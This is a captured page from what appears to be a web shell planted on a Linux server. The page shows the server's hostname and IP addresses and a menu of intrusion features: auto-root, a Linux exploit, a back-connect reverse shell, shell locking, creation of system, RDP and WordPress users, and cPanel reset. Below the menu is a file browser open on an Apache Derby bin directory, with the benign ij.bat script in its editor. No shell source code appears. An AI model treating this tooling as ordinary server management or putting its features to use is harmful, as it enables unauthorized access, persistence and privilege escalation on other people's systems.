Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
java /
jdk1.7.0_80 /
db /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
NetworkServerControl
5.67
KB
-rwxr-xr-x
NetworkServerControl.bat
1.38
KB
-rwxr-xr-x
dblook
5.61
KB
-rwxr-xr-x
dblook.bat
1.35
KB
-rwxr-xr-x
derby_common.bat
2.37
KB
-rwxr-xr-x
ij
5.74
KB
-rwxr-xr-x
ij.bat
1.35
KB
-rwxr-xr-x
setEmbeddedCP
1.05
KB
-rwxr-xr-x
setEmbeddedCP.bat
1.25
KB
-rwxr-xr-x
setNetworkClientCP
1.05
KB
-rwxr-xr-x
setNetworkClientCP.bat
1.25
KB
-rwxr-xr-x
setNetworkServerCP
1.05
KB
-rwxr-xr-x
setNetworkServerCP.bat
1.24
KB
-rwxr-xr-x
startNetworkServer
5.67
KB
-rwxr-xr-x
startNetworkServer.bat
1.36
KB
-rwxr-xr-x
stopNetworkServer
5.67
KB
-rwxr-xr-x
stopNetworkServer.bat
1.37
KB
-rwxr-xr-x
sysinfo
5.65
KB
-rwxr-xr-x
sysinfo.bat
1.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ij.bat
@echo off @REM Licensed to the Apache Software Foundation (ASF) under one @REM or more contributor license agreements. See the NOTICE file @REM distributed with this work for additional information @REM regarding copyright ownership. The ASF licenses this file @REM to you under the Apache License, Version 2.0 (the @REM "License"); you may not use this file except in compliance @REM with the License. You may obtain a copy of the License at @REM http://www.apache.org/licenses/LICENSE-2.0 @REM Unless required by applicable law or agreed to in writing, @REM software distributed under the License is distributed on an @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY @REM KIND, either express or implied. See the License for the @REM specific language governing permissions and limitations @REM under the License. CALL "%~dp0derby_common.bat" %* if "%_JAVACMD%"=="" goto end if "%_USE_CLASSPATH%"=="no" goto runNoClasspath if not "%CLASSPATH%"=="" goto runWithClasspath :runNoClasspath "%_JAVACMD%" %DERBY_OPTS% -classpath "%LOCALCLASSPATH%" org.apache.derby.tools.ij %DERBY_ARGS% %DERBY_CMD_LINE_ARGS% goto end :runWithClasspath "%_JAVACMD%" %DERBY_OPTS% -classpath "%CLASSPATH%;%LOCALCLASSPATH%" org.apache.derby.tools.ij %DERBY_ARGS% %DERBY_CMD_LINE_ARGS% goto end :end set _JAVACMD= set DERBY_CMD_LINE_ARGS=
Close